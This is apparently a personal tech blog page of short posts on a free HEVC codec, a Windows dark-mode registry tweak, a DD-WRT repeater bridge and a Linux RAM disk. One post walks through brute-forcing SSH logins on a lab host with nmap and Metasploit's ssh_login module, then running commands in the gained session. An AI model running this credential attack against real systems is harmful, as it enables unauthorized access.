Thanks to Barnacules Nerdgasm for posting this. Save a 1$ and get the codec free from Microsoft
Link to download FREE HEVC H265 video codec from Microsoft Store 👇
http://bit.ly/freehevc - Free Codec from Device Manufacturers
^- Don't buy the codec "Movies & TV" redirects you to, it's not necessary!
If Microsoft wants you to log in with your account or you don't have on, just click the X and it will install.
Sunday, September 8, 2019
Wednesday, August 28, 2019
If you want Dark mode, well you know...
Regedit
Find and go to the HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > Windows > CurrentVersion > Themes > Personalize
For me Personalize folder is missing, if same in your case then Create new Key, Right click on Theme > New > Key (Give name Personalize)
Next Right click on Personalize folder and New > DWORD (32-bit) (Give name AppsUseLightTheme) and Set value to 0 (Right click on file > Modify)
Now perform the same steps 3 in this location: HKEY_CURRENT_USER > SOFTWARE > Microsoft > Windows > CurrentVersion > Themes > Personalize
if exists, modify and set value to 0
Restart your Lap
Saturday, June 22, 2019
How To Set Up A Repeater Bridge On Your DD-WRT Router
To begin, make sure that the main router has a 192.168.1.X subnet and leases a DHCP address in the same pool. The secondary router must be running DD-WRT.
To ensure an easy set up, always click Save and not Apply between steps.
- Reset to Factory Defaults on the secondary DD-WRT router. Perform a hard reset if needed.
- Hook up the secondary router with an Ethernet cord or just as a wireless client.
- Open the address http://192.168.1.1/ in your browser to access the DD-WRT GUI.
- Open the Wireless tab and then the Basic Settings tab
- Physical Interface
- Wireless Mode: Repeater Bridge
- Wireless Network Mode: Same as main router
- Wireless Network Name(SSID): Same as main router, including case
- Wireless Channel: Auto
- Sensitivity Range (ACK Timing): 0
- Click Save
- Virtual Interfaces: Click Add
- Wireless Network Name(SSID): Different SSID than Primary SSID
- Click Save
- Physical Interface
- Open the Wireless tab and then the Wireless Security tab
- Physical Interface (WPA2-AES is recommended)
- Security Mode, WPA Algorithms, Shared Key: Same as main router
- Virtual Interfaces
- Security Mode, WPA Algorithms, Shared Key: Same as main router
- Click Save
- Physical Interface (WPA2-AES is recommended)
- Open the Security tab and then the Firewall tab
- Uncheck all boxes except Filter Multicast
- Disable SPI Firewall
- Click Save
- Open the Services tab and then Services tab
- Disable DNSMasq
- Click Save
- Open the Setup tab then the Basic Setup tab
- WAN Connection Type: Disabled
- IP Address: 192.168.1.2
- Mask: 255.255.255.0
- Gateway: 192.168.1.1 (Same as main router)
- DHCP Server: Disable
- Local DNS: 192.168.1.1 (Same as main router)
- Assign WAN Port to Switch: Use WAN port as another LAN port (Optional)
- Click Save
- Open the Setup tab and then Advanced Routing tab
- Change Mode to Router
- Click Save and then APPLY
- Wait 30 seconds and then power off the router and power it back on.
- Allow router to fully boot up.
- Open the address http://192.168.1.2/ to access the router GUI at its new IP address
- Check internet connectivity, if it does not work then reboot the router
Wednesday, April 24, 2019
Create a RAM disk in Linux for fast file processes or forensics
I use this from time to time to do analysis on files for forensics reasons and I need some speed using the tools. A RAM disk can speed things up a lot but remember it will be gone the next time you restart.
commands
mkdir -p /mnt/ram
mount -t tmpfs tmpfs /mnt/ram -o size=8192M
typical speed on a SSD would about about 190MB/s for file reads and writes
using a RAM disk you can see up to 3.2 GB/s read and writes
good way to put things that need higher access, if you want to recreate at boot up you could create a shell script that would create the RAM disk and copy a file(s) to it.
commands
mkdir -p /mnt/ram
mount -t tmpfs tmpfs /mnt/ram -o size=8192M
typical speed on a SSD would about about 190MB/s for file reads and writes
using a RAM disk you can see up to 3.2 GB/s read and writes
good way to put things that need higher access, if you want to recreate at boot up you could create a shell script that would create the RAM disk and copy a file(s) to it.
Friday, March 29, 2019
Using Metasploit to exploit SSH on target system
looking for open SSH on target system
-nmap -A -Pn 10.0.2.15
found 22/tcp open ssh
- msfconsole
- search ssh_login
- use auxiliary/scanner/ssh/ssh_login
- set RHOSTS 10.0.2.15
- set USER_FILE /root/Desktop/user.txt <- make sure you have one
- set PASS_FILE /root/Desktop/user.txt <- make sure you have one
- set STOP ON SUCCESS true
- set VERBOSE true
- exploit
- sessions
start issuing commands and see what you got
- ls
- whoami
- uname -a
<enjoy>
Thursday, February 14, 2019
Subscribe to:
Posts (Atom)

